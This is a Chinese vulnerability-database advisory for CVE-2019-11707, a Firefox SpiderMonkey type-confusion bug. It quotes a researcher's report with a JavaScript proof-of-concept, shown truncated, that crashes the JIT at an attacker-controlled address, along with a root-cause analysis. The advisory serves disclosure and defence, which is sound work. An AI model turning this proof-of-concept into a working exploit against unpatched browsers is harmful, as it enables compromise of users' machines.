Mozilla Firefox和Mozilla Firefox ESR 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1634749 漏洞类型 代码问题
发布时间 2019-06-18 更新时间 2019-06-18
CVE编号 CVE-2019-11707 CNNVD-ID CNNVD-201906-726
漏洞平台 N/A CVSS评分 N/A
Mozilla Firefox和Mozilla Firefox ESR都是美国Mozilla基金会的产品。Mozilla Firefox是一款开源Web浏览器。Mozilla Firefox ESR是Firefox(Web浏览器)的一个延长支持版本。 Mozilla Firefox 67.0.3之前版本和Firefox ESR 60.7.1之前版本中的Array.pop文件存在类型混淆漏洞。攻击者可利用该漏洞造成拒绝服务(崩溃)。
Spidermonkey: IonMonkey incorrectly predicts return type of Array.prototype.pop, leading to type confusions 

Related CVE Numbers: CVE-2019-11707Fixed-2019-Jun-18.

The following program (found through fuzzing and manually modified) crashes Spidermonkey built from the current beta channel and Firefox 66.0.3 (current stable):

    // Run with --no-threads for increased reliability
    const v4 = [{a: 0}, {a: 1}, {a: 2}, {a: 3}, {a: 4}];
    function v7(v8,v9) {
        if (v4.length == 0) {
            v4[3] = {a: 5};

        // pop the last value. IonMonkey will, based on inferred types, conclude that the result
        // will always be an object, which is untrue when  p[0] is fetched here.
        const v11 = v4.pop();

        // Then if will crash here when dereferencing a controlled double value as pointer.

        // Force JIT compilation.
        for (let v15 = 0; v15 < 10000; v15++) {}

    var p = {};
    p.__proto__ = [{a: 0}, {a: 1}, {a: 2}];
    p[0] = -1.8629373288622089e-06;
    v4.__proto__ = p;

    for (let v31 = 0; v31 < 1000; v31++) {

When run, it produces a crash similar to the following:

    * thread #1, queue = '', stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
        frame #0: 0x000025a3b99b26cb
    ->  0x25a3b99b26cb: cmp    qword ptr [rax], r11
        0x25a3b99b26ce: jne    0x25a3b99b26dd
        0x25a3b99b26d4: cmovne rax, rcx
        0x25a3b99b26d8: jmp    0x25a3b99b26f4
    Target 0: (js) stopped.
    (lldb) reg read rax
         rax = 0x4141414141414141

I haven't thoroughly analyzed bug, but here is roughly what appears to be happening:

* when v4 is created, it will have inferred types for its elements, indicating that they will be JSObjects (this can be seen by running the spidermonkey shell with `INFERFLAGS=full` in the environment)
* in the block following the function definition, v4's prototype is changed to a new object with a double as element 0. This does not change the inferred element types of v4, presumably because these only track own properties/elements and not from prototypes
* v7 is executed a few times and all original elements from v4 are popped
* the element assignment (`v4[3] = ...`) changes the length of the array (to 4) without changing the inferred element types

Afterwards, v7 is (re-)compiled by IonMonkey:
* the call to v4.pop() is inlined by IonMonkey and converted to an MArrayPopShift instruction [1]
* since the inferred element types (JSObjects) match the observed types, no type barrier is emitted [2, 3]
* IonMonkey now assumes that the result of v4.pop() will be an object, thus omits type checks and directly proceed with the property load
* Later, when generating machine code for v4.pop [4], IonMonkey generates a call to the runtime function ArrayPopDense [5]

At execution time of the JITed code, when v4.length is back at 1 (and so the only element left to pop is element 0), the following happens:
* The runtime call to ArrayPopDense is taken
* this calls js::array_pop which in turn proceeds to load p[0] as v4 doesn't have a property with name '0'
* the array pop operation thus returns a double value

However, the JITed code still assumes that it received a JSObject* from the array pop operation and goes on to dereference the value, leading to a crash at an attacker controlled address. It is likely possible to exploit this bug further as type inference issues are generally well exploitable.

To summarize, the problem seems to be that the code handling Array.pop in IonMonkey doesn't take into account that Array.prototype.pop can load an element from the prototype, which could conflict with the array's inferred element types.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Found by:

Mozilla Firefox ESR 60.7.1 Mozilla Firefox 67.0.3